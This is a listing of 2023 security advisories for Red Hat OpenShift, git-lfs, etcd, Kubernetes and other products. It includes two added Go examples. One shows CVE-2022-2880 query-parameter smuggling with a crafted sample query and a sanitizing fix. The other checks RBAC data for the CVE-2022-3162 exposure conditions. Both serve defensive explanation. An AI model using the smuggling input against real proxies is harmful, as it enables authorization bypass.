Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.12.4 on Red Hat Enterprise Linux 8 from Red Hat Container Registry. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3172: A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This issue leads to the client performing unexpected actions and forwarding the client's API server credentials to third parties.

RHSA-2023:3541: Red Hat Security Advisory: OpenShift Container Platform 4.11.43 packages and security update

Red Hat OpenShift Container Platform release 4.11.43 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2995: Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct acc...

Red Hat Security Advisory 2023-3216-01

Red Hat Security Advisory 2023-3216-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.60.

RHSA-2023:3296: Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.2.4 security fixes and container updates

Multicluster Engine for Kubernetes 2.2.4 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host ...

RHSA-2023:3216: Red Hat Security Advisory: OpenShift Container Platform 4.10.60 packages and security update

Red Hat OpenShift Container Platform release 4.10.60 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2995: Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct acc...

CVE-2023-23694: DSA-2023-071: Dell VxRail Security Update for Multiple Third-Party Component Vulnerabilities – 7.0.450

Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.

RHSA-2023:0584: Red Hat Security Advisory: Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 security update

Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy sanitizes the query ...

Red Hat Security Advisory 2023-1325-01

Red Hat Security Advisory 2023-1325-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0. Issues addressed include bypass, denial of service, and information leakage vulnerabilities.

Red Hat Security Advisory 2023-1328-01

Red Hat Security Advisory 2023-1328-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include denial of service and out of bounds read vulnerabilities.

Red Hat Security Advisory 2023-1326-01

Red Hat Security Advisory 2023-1326-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.0. Issues addressed include bypass, denial of service, information leakage, out of bounds read, and remote SQL injection vulnerabilities.

RHSA-2023:3204: Red Hat Security Advisory: OpenShift Virtualization 4.13.0 RPMs security and bug fix update

Red Hat OpenShift Virtualization release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown. * CVE-2022-32149: A vulnerability was found in the golang.org/x/text/language pack...

RHSA-2023:1325: Red Hat Security Advisory: OpenShift Container Platform 4.13.0 security update

Red Hat OpenShift Container Platform release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.13. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2990: An incorrect handling of the supplementary groups in the Buildah container engine might lead to the sensitive information disclosure or possible data modification if an attacker has d...

RHSA-2023:1326: Red Hat Security Advisory: OpenShift Container Platform 4.13.0 security update

Red Hat OpenShift Container Platform release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.13. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If p...

Red Hat Security Advisory 2023-1327-01

Red Hat Security Advisory 2023-1327-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0.

RHSA-2023:2780: Red Hat Security Advisory: Image Builder security, bug fix, and enhancement update

An update for cockpit-composer, osbuild, osbuild-composer, and weldr-client is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: A flaw was found in the golang package, where archive/tar Reader.Read does not set a limit on the maximum size of file headers. After fixing, Reader.Read limits the maximum size of header blocks to 1 MiB. This flaw allows a maliciously crafted archive to cause Read to allocate unbounded amounts of memory, ...

RHSA-2023:2866: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy saniti...

Red Hat Security Advisory 2023-2177-01

Red Hat Security Advisory 2023-2177-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

RHSA-2023:2177: Red Hat Security Advisory: grafana-pcp security and enhancement update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown.

RHSA-2023:2357: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted some invalid Transfer-Encoding headers as indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly failed to reject the invalid header. * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by r...
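
CVE-2022-2880, listed in the Secondary Scheduler Operator entry and in both git-lfs entries above, is a parser-disagreement bug: url.ParseQuery in net/http drops a parameter it cannot parse (a ';' separator, a bad %-escape) and reports an error, but the unfixed httputil.ReverseProxy still forwarded the raw query string, so a backend with a more lenient parser could act on a parameter the Go side never validated. The Go program below is an added illustration, not code from Go, Red Hat or any project in these advisories. lenientParseQuery is a constructed stand-in for such a backend (one that also splits on ';'), sanitizeForwardedQuery re-implements the effect of the fix outside the standard library rather than calling into it, and the sample query and the "role"/"debug" parameter names are invented for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// lenientParseQuery models an upstream server that treats ';' as a parameter
// separator in addition to '&' (Go itself did this before 1.17; other stacks
// still do). Constructed stand-in for the lenient backend in the
// CVE-2022-2880 scenario, not code from any real server.
func lenientParseQuery(raw string) map[string]string {
	params := map[string]string{}
	sep := func(r rune) bool { return r == '&' || r == ';' }
	for _, kv := range strings.FieldsFunc(raw, sep) {
		k, v, _ := strings.Cut(kv, "=")
		params[k] = v
	}
	return params
}

// strictQueryKeys returns the sorted parameter names url.ParseQuery accepts,
// and whether it reported an unparseable parameter. Since Go 1.17 a
// parameter containing ';' (or a malformed %-escape) is dropped and an error
// is returned, but the map still holds every parameter that did parse.
func strictQueryKeys(raw string) ([]string, bool) {
	values, err := url.ParseQuery(raw)
	keys := make([]string, 0, len(values))
	for k := range values {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return keys, err != nil
}

// smuggledParams lists the parameters the lenient backend would act on that
// the Go side never treated as valid: the gap CVE-2022-2880 is about.
func smuggledParams(raw string) []string {
	accepted := map[string]bool{}
	keys, _ := strictQueryKeys(raw)
	for _, k := range keys {
		accepted[k] = true
	}
	var smuggled []string
	for k := range lenientParseQuery(raw) {
		if !accepted[k] {
			smuggled = append(smuggled, k)
		}
	}
	sort.Strings(smuggled)
	return smuggled
}

// sanitizeForwardedQuery reproduces the effect the fix has on the query an
// httputil.ReverseProxy forwards: a query that parses cleanly goes through
// unchanged; one that url.ParseQuery rejects is rebuilt from the parameters
// that parsed, so the unparseable fragment never reaches the backend.
// Stand-alone re-implementation for illustration; the patched standard
// library does the equivalent internally.
func sanitizeForwardedQuery(raw string) string {
	values, err := url.ParseQuery(raw)
	if err == nil {
		return raw
	}
	return values.Encode()
}

func main() {
	// Constructed request: the proxy is expected to authorize on "role"; the
	// attacker appends ";debug=1" so Go drops the whole "role=admin;debug=1"
	// fragment while a lenient backend still sees role=admin and debug=1.
	raw := "user=alice&role=admin;debug=1"

	keys, rejected := strictQueryKeys(raw)
	fmt.Printf("proxy sees %v (unparseable parameter present: %v)\n", keys, rejected)
	fmt.Printf("lenient backend sees %v\n", lenientParseQuery(raw))
	fmt.Printf("smuggled past the proxy: %v\n", smuggledParams(raw))

	clean := sanitizeForwardedQuery(raw)
	fmt.Printf("forwarded after fix: %q, smuggled: %v\n", clean, smuggledParams(clean))
}
```

Run it with `go run` on Go 1.18 or later (it uses strings.Cut). The operational point for a proxy you run: if authorization is decided on query parameters in front of a backend with a different parser, parse once and forward only what you validated, which is what the patched ReverseProxy does; the same test applied to a proxy written in another language tells you whether it has the equivalent gap.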

Red Hat Security Advisory 2023-2041-01

Red Hat Security Advisory 2023-2041-01 - Migration Toolkit for Applications 6.1.0 Images. Issues addressed include denial of service, privilege escalation, server-side request forgery, and traversal vulnerabilities.

RHSA-2023:2041: Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update

Migration Toolkit for Applications 6.1.0 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3782: A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect ...

Red Hat Security Advisory 2023-1656-01

Red Hat Security Advisory 2023-1656-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.56.

Red Hat Security Advisory 2023-1655-01

Red Hat Security Advisory 2023-1655-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.56. Issues addressed include bypass, cross site scripting, information leakage, insecure permissions, and privilege escalation vulnerabilities.

RHSA-2023:1655: Red Hat Security Advisory: OpenShift Container Platform 4.10.56 security update

Red Hat OpenShift Container Platform release 4.10.56 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3172: A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This issue leads to the client performing unexpected acti...

CVE-2023-1802: Docker Desktop release notes

In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a private registry are affected.

Red Hat Security Advisory 2023-1448-01

Red Hat Security Advisory 2023-1448-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

RHSA-2023:1428: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.8 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.8 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36567: A flaw was found in gin. This issue occurs when the default Formatter for the Logger middleware (LoggerConfig.Formatter), which is included in the Default engine, allows attackers to inject arbitrary log entries by manipulating the request path. * CVE-2022-24999: A flaw was found in the express.js npm package. Express.js Express is vulnerable to a d...

Red Hat Security Advisory 2023-1286-01

Red Hat Security Advisory 2023-1286-01 - Migration Toolkit for Runtimes 1.0.2 Images. Issues addressed include denial of service, privilege escalation, and server-side request forgery vulnerabilities.

Red Hat Security Advisory 2023-1275-01

Red Hat Security Advisory 2023-1275-01 - An update for etcd is now available for Red Hat OpenStack Platform. Issues addressed include a denial of service vulnerability.

RHSA-2023:1275: Red Hat Security Advisory: Red Hat OpenStack Platform (etcd) security update

An update for etcd is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted some invalid Transfer-Encoding headers as indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly failed to reject the invalid header. * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by rev...

Red Hat Security Advisory 2023-1174-01

Red Hat Security Advisory 2023-1174-01 - OpenShift API for Data Protection (OADP) 1.1.2 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate.

Red Hat Security Advisory 2023-1079-01

Red Hat Security Advisory 2023-1079-01 - An update for osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container is now available for Red Hat OpenStack Platform 16.2 (Train).

RHSA-2023:1042: Red Hat Security Advisory: Custom Metrics Autoscaler Operator for Red Hat OpenShift (with security updates)

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted some invalid Transfer-Encoding headers as indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly failed to reject the invalid header. * CVE-2022-1962: A flaw was found in the golang standard library, go/par...

CVE-2022-3162: Unauthorized read of Custom Resources · Issue #113756 · kubernetes/kubernetes

Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true:

1. There are 2+ CustomResourceDefinitions sharing the same API group.
2. Users have cluster-wide list or watch authorization on one of those custom resources.
3. The same users are not authorized to read another custom resource in the same API group.
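
The three conditions above are a static property of a cluster's CRDs and cluster-wide RBAC, so they can be checked before the apiserver update lands. The Go program below is an added example, not kube-apiserver code or anything from the kubernetes issue; it encodes the conditions over two small structs and constructed sample data (the apps.example.io and infra.example.io groups, the widget-watcher and other service accounts, and the resource names are all invented for the example). In a real cluster the CRD list comes from `kubectl get crd` and the grants from ClusterRoleBindings together with the ClusterRoles they reference; RBAC wildcard matching is modelled, aggregated ClusterRoles and resourceNames restrictions are not. An empty result only means the precondition is absent; the fix itself is the updated kube-apiserver shipped in the advisories on this page.

```go
package main

import (
	"fmt"
	"sort"
)

// CRD is the part of a CustomResourceDefinition this check needs: API group,
// plural resource name and scope.
type CRD struct {
	Group      string
	Resource   string
	Namespaced bool
}

// ClusterGrant is one cluster-wide permission, as it would be flattened from
// a ClusterRole rule bound to a subject by a ClusterRoleBinding. "*" matches
// anything, as it does in RBAC rules.
type ClusterGrant struct {
	Subject  string
	APIGroup string
	Resource string
	Verbs    []string
}

// Exposure is one subject that meets all three conditions for the given group.
type Exposure struct {
	Subject      string
	Group        string
	Authorized   string // resource the subject may list/watch cluster-wide
	Unauthorized string // resource in the same group it may not read
}

func match(pattern, value string) bool { return pattern == "*" || pattern == value }

func hasListOrWatch(verbs []string) bool {
	for _, v := range verbs {
		if v == "*" || v == "list" || v == "watch" {
			return true
		}
	}
	return false
}

// canListOrWatch reports whether any grant gives subject cluster-wide list or
// watch on crd.
func canListOrWatch(grants []ClusterGrant, subject string, crd CRD) bool {
	for _, g := range grants {
		if g.Subject == subject && match(g.APIGroup, crd.Group) &&
			match(g.Resource, crd.Resource) && hasListOrWatch(g.Verbs) {
			return true
		}
	}
	return false
}

// findExposures applies the three conditions from the issue: two or more CRDs
// share an API group; a subject has cluster-wide list/watch on a namespaced one
// of them; and that subject lacks list/watch on another CRD in the same group.
func findExposures(crds []CRD, grants []ClusterGrant) []Exposure {
	byGroup := map[string][]CRD{}
	for _, c := range crds {
		byGroup[c.Group] = append(byGroup[c.Group], c)
	}
	subjects := map[string]bool{}
	for _, g := range grants {
		subjects[g.Subject] = true
	}

	var found []Exposure
	for group, members := range byGroup {
		if len(members) < 2 {
			continue // condition 1 not met
		}
		for subject := range subjects {
			for _, a := range members {
				if !a.Namespaced || !canListOrWatch(grants, subject, a) {
					continue // condition 2 not met for this resource
				}
				for _, b := range members {
					if b.Resource != a.Resource && !canListOrWatch(grants, subject, b) {
						found = append(found, Exposure{subject, group, a.Resource, b.Resource}) // condition 3
					}
				}
			}
		}
	}
	// Map iteration order is random; sort so output and tests are stable.
	sort.Slice(found, func(i, j int) bool {
		x, y := found[i], found[j]
		return x.Subject+"/"+x.Group+"/"+x.Authorized+"/"+x.Unauthorized <
			y.Subject+"/"+y.Group+"/"+y.Authorized+"/"+y.Unauthorized
	})
	return found
}

// sampleCRDs and sampleGrants are constructed inputs, not data from any real
// cluster.
func sampleCRDs() []CRD {
	return []CRD{
		{Group: "apps.example.io", Resource: "widgets", Namespaced: true},
		{Group: "apps.example.io", Resource: "tenantconfigs", Namespaced: true},
		{Group: "infra.example.io", Resource: "nodepools", Namespaced: false},
	}
}

func sampleGrants() []ClusterGrant {
	return []ClusterGrant{
		// May watch widgets everywhere, nothing else in the group: exposed.
		{Subject: "system:serviceaccount:monitoring:widget-watcher",
			APIGroup: "apps.example.io", Resource: "widgets", Verbs: []string{"get", "list", "watch"}},
		// Has everything, so no resource in the group is unauthorized for it.
		{Subject: "system:serviceaccount:ops:platform-admin",
			APIGroup: "*", Resource: "*", Verbs: []string{"*"}},
		// Reads a group with a single CRD: condition 1 fails.
		{Subject: "system:serviceaccount:infra:pool-reader",
			APIGroup: "infra.example.io", Resource: "nodepools", Verbs: []string{"list"}},
	}
}

func main() {
	for _, e := range findExposures(sampleCRDs(), sampleGrants()) {
		fmt.Printf("%s: list/watch on %s.%s also exposes %s.%s on an unpatched apiserver\n",
			e.Subject, e.Authorized, e.Group, e.Unauthorized, e.Group)
	}
}
```

The check deliberately reports only cluster-wide grants: a Role bound in one namespace does not meet condition 2, so namespaced RoleBindings can be left out of the input. Subjects with "*" on the group show up nowhere, which is correct for this bug but is a separate least-privilege finding in its own right.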

RHSA-2023:0890: Red Hat Security Advisory: OpenShift Container Platform 4.12.5 security update

Red Hat OpenShift Container Platform release 4.12.5 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: A flaw was found in golang. The golang.org/x/text/language package can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to cra...

Red Hat Security Advisory 2023-0918-01

Red Hat Security Advisory 2023-0918-01 - Service Binding manages the data plane for applications and backing services.

RHSA-2023:0774: Red Hat Security Advisory: OpenShift Container Platform 4.11.28 security update

Red Hat OpenShift Container Platform release 4.11.28 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: A flaw was found in goutils where randomly generated alphanumeric strings contain significantly less entropy than expected. Both the `RandomAlphaNumeric` and `CryptoRandomAlphaNumeric` functions always return strings containing at least one digit from 0 to 9. This issu...

Red Hat Security Advisory 2023-0772-01

Red Hat Security Advisory 2023-0772-01 - Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built from the edge capabilities of Red Hat OpenShift. MicroShift is an application that is deployed on top of Red Hat Enterprise Linux devices at the edge, providing an efficient way to operate single-node clusters in these low-resource environments. This advisory contains the RPM packages for Red Hat build of MicroShift 4.12.4.

RHSA-2023:0772: Red Hat Security Advisory: Red Hat build of MicroShift 4.12.4 security update

Red Hat build of MicroShift release 4.12.4 is now available with updates to packages and images that fix several bugs. This release includes a security update for the Red Hat build of MicroShift 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3162: A flaw was found in kubernetes. Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different kind in the same API group they are not authorized to read...

Red Hat Security Advisory 2023-0727-01

Red Hat Security Advisory 2023-0727-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.3.

Red Hat Security Advisory 2023-0795-01

Red Hat Security Advisory 2023-0795-01 - Submariner 0.13.3 packages that fix various bugs and add various enhancements that are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6.

Red Hat Security Advisory 2023-0794-01

Red Hat Security Advisory 2023-0794-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.4 images. Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console, with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.

RHSA-2023:0794: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.4 bug fixes and security updates

Red Hat Advanced Cluster Management for Kubernetes 2.6.4 General Availability release images, which fix bugs and update container images. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-24999: qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an `__proto__` key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload i...

Red Hat Security Advisory 2023-0574-01

Red Hat Security Advisory 2023-0574-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.55. Issues addressed include a bypass vulnerability.

RHSA-2023:0574: Red Hat Security Advisory: OpenShift Container Platform 4.9.55 security update

